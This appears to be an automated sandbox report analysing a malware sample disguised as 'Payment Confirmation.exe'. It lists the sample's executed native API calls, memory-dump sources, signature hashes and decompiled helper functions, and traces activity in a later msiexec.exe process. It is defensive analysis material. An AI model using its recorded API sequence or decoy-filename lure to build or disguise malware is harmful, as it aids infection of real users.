                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment Confirmation.exe,C:\Users\user\Desktop\Payment Confirmation.exe,80000000,00000003), ref: 004056D8
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment Confirmation.exe,C:\Users\user\Desktop\Payment Confirmation.exe,80000000,00000003), ref: 004056E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3125694417
                                                  • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                  • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                                  • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                  • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004057E4, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004057E4(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                  0x004057f0
                                                  0x004057f2
                                                  0x0040581a
                                                  0x004057ff
                                                  0x00405804
                                                  0x0040580f
                                                  0x00000000
                                                  0x0040582c
                                                  0x00405818
                                                  0x00405818
                                                  0x00000000

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405812
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                  • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                                  • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                  • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: Payment Confirmation.exe PID: 5440 Parent PID: 2244 Payment Confirmation.exeCOMMON

                                                  Executed Functions

                                                  Function 00418680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: A:A
                                                  • API String ID: 2738559852-2859176346
                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                  • Instruction ID: 6c7918579f63920fb86cd593affe8adf5c0c2a6eede5319f465e69fff998d711
                                                  • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                  • Instruction Fuzzy Hash: 140152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004088E0, Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
                                                  • Instruction ID: fecb9998d56daf9cfaa78a55d0f1ea928f7019af28acdd4276aec55bf8742b64
                                                  • Opcode Fuzzy Hash: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
                                                  • Instruction Fuzzy Hash: 4C212BB2D4020857CB10E6649E42BFF736C9B50304F04017FE989A2181F639AB498BA7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004188D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E004188D2(intOrPtr __eax, intOrPtr* __ebx, void* __ecx, void* _a4, long _a8, void* _a12, long _a16, long _a20) {
				char _v0;
				void* __esi;
				void* __ebp;
				void* _t12;

				_push(cs);
				asm("cmpsd");
				asm("lodsd");
				 *0x75677a62 = __eax;
				if( *__ebx >= __ecx) {
					asm("adc al, 0x9");
					 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
					_t3 =  &_a12; // 0x413546
					_t12 = RtlAllocateHeap( *_t3, _a16, _a20); // executed
					return _t12;
				} else {
					__ebp = __esp;
					__eax = _v0;
					__ecx =  *((intOrPtr*)(__eax + 0x10));
					_t6 = __eax + 0xc74; // 0xc74
					__esi = _t6;
					__eax = _a8;
					__ecx = _a4;
					__eax = RtlFreeHeap(_a4, _a8, _a12); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                                  0x004188d2
                                                  0x004188d3
                                                  0x004188d6
                                                  0x004188d9
                                                  0x004188de
                                                  0x004188b8
                                                  0x004188ba
                                                  0x004188c2
                                                  0x004188cd
                                                  0x004188d1
                                                  0x004188e0
                                                  0x004188e1
                                                  0x004188e3
                                                  0x004188e6
                                                  0x004188ef
                                                  0x004188ef
                                                  0x004188ff
                                                  0x00418902
                                                  0x0041890d
                                                  0x0041890f
                                                  0x00418910
                                                  0x00418911
                                                  0x00418911

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188CD
                                                  • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateFree
                                                  • String ID: F5A
                                                  • API String ID: 2488874121-683449296
                                                  • Opcode ID: 37f69f484ca45f7459a1b64255040918bd6cf93917e722737f6b46c40e891233
                                                  • Instruction ID: 44880b60090aabbdcaa74a99a08852773980f0c1a0aa9405f98cdf5d61cc9b4a
                                                  • Opcode Fuzzy Hash: 37f69f484ca45f7459a1b64255040918bd6cf93917e722737f6b46c40e891233
                                                  • Instruction Fuzzy Hash: 48F0AFB2210208AFDB14EF59DC45EE733A8EF88350F018599FD0897341E630EA10CBB5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID: F5A
                                                  • API String ID: 1279760036-683449296
                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
                                                  • Instruction ID: a55241834724a4f9522fcddb18cdf12f322e24b5025e529ea1e7499cfe7347ca
                                                  • Opcode Fuzzy Hash: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
                                                  • Instruction Fuzzy Hash: 88018431A8022876E721BA959C03FFF776C5B00B55F14015AFF04BA1C2E6A8790586FA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409B43, Relevance: 1.5, APIs: 1, Instructions: 42libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 06ec5ad617f0480dac7ab3218ad283f91d90700fe353b1101687e29cdd682e72
                                                  • Instruction ID: 5a7f1c5f613fd2d39734e4e3144daf8f743a8f34f36f31e24c5c9ec0a7e275d5
                                                  • Opcode Fuzzy Hash: 06ec5ad617f0480dac7ab3218ad283f91d90700fe353b1101687e29cdd682e72
                                                  • Instruction Fuzzy Hash: 40F0A4B1A4010EABCF00DA90E842F9DB774EB54318F0082A6E91C9B291F675EA45CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A70
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Analysis Process: msiexec.exe PID: 1516 Parent PID: 3440 msiexec.exeCOMMON

                                                  Executed Functions

                                                  Function 00468623, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(00463D82,5E972F65,FFFFFFFF,?,?,?,00463D82,?,A:F,FFFFFFFF,5E972F65,00463D82,?,00000000), ref: 004686C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: *9F
                                                  • API String ID: 2738559852-1537241915
                                                  • Opcode ID: 2d020790991105bb80e00e24b9279485b7ced82ad1456c299bb63c61b104a32a
                                                  • Instruction ID: 04f1ee30ed322f5af423ee51b11042dec78d888b4ef2f010abb02c97a7e47903
                                                  • Opcode Fuzzy Hash: 2d020790991105bb80e00e24b9279485b7ced82ad1456c299bb63c61b104a32a
                                                  • Instruction Fuzzy Hash: 4D1146B6200009AFCB08DFA9DC80DEB77ADEF8C350B14864DFA5DD7241D634E8128BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0046867A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(00463D82,5E972F65,FFFFFFFF,?,?,?,00463D82,?,A:F,FFFFFFFF,5E972F65,00463D82,?,00000000), ref: 004686C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: A:F
                                                  • API String ID: 2738559852-873399353
                                                  • Opcode ID: f0122490124dfe175d076c63a8d3a45a62035b2e880e092d42bed573bbcf04a1
                                                  • Instruction ID: 2882ef921460a4321fcc19e44c8528a87fbdfee583d87e6a2d6ba586b54a1f0f
                                                  • Opcode Fuzzy Hash: f0122490124dfe175d076c63a8d3a45a62035b2e880e092d42bed573bbcf04a1
                                                  • Instruction Fuzzy Hash: 2A016172200108ABDB14DF98CC85EDB77ADEF8C314F158649FE0C97241D670E900CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004685CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00463BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00463BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0046861D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: fa4d3fe93a5bd96e72967c4d0221322ce0d1c4d2c002e3a71f875b488435deae
                                                  • Instruction ID: 060f5de0066bb04576f7126b7148f9a116549cb7907b5bce8df2e44593486091
                                                  • Opcode Fuzzy Hash: fa4d3fe93a5bd96e72967c4d0221322ce0d1c4d2c002e3a71f875b488435deae
                                                  • Instruction Fuzzy Hash: 8A01AFB2215108ABCB08CF88DC85EEB77A9AF8C754F158248BA0D97241D630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004685D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00463BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00463BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0046861D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction ID: e3c7de60906946d7e97643ec0fe108bf2891d380902998db74fe7f8fe0efde18
                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction Fuzzy Hash: EAF0BDB2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241D630E811CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00468680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(00463D82,5E972F65,FFFFFFFF,?,?,?,00463D82,?,A:F,FFFFFFFF,5E972F65,00463D82,?,00000000), ref: 004686C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: A:F
                                                  • API String ID: 2738559852-873399353
                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction ID: fd6ce6e4b18fce88abd46e8d2e29e897ccc4afd4e61e51e95d12efc52579d554
                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction Fuzzy Hash: 89F0A4B2200208ABDB18DF89DC85EEB77ADAF8C754F158249BE1D97241D630E811CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004686FA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(`=F,?,?,00463D60,00000000,FFFFFFFF), ref: 00468725
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID: `=F
                                                  • API String ID: 3535843008-1119993385
                                                  • Opcode ID: cbcad465a63d4d0a1ce22f6032d6345f36519db11c114d8f1c8a81c84402be5f
                                                  • Instruction ID: e8eda8fa9773eb88b378d1c09aae670eb6949bcf84132ed92ad1daad0035348b
                                                  • Opcode Fuzzy Hash: cbcad465a63d4d0a1ce22f6032d6345f36519db11c114d8f1c8a81c84402be5f
                                                  • Instruction Fuzzy Hash: D6E0C2362002046BD714EFD8CC89EDB7768EF447A0F154599BA095B242D270EA00C7D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00468700, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(`=F,?,?,00463D60,00000000,FFFFFFFF), ref: 00468725
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID: `=F
                                                  • API String ID: 3535843008-1119993385
                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                  • Instruction ID: 1ce05f4622578eac148ec1efc46ba565654193626a4ae51d06dc1cbf9c9f782d
                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                  • Instruction Fuzzy Hash: ADD012752002146BD714EB99CC45ED7775CEF44750F154459BA185B242D570F90086E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04529840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fd1c55f362b8e762f6494c60c2fec603f26d5efa1717934a2af3015b02cef79b
                                                  • Instruction ID: d13f3d3d0d33525fe4be4dd28af7a832662f26890c8c6f2d434483573a18d8e3
                                                  • Opcode Fuzzy Hash: fd1c55f362b8e762f6494c60c2fec603f26d5efa1717934a2af3015b02cef79b
                                                  • Instruction Fuzzy Hash: 4B900261292045527545B15944045074166B7E0687B91C012A1405A50C8566E86AF661
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04529860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
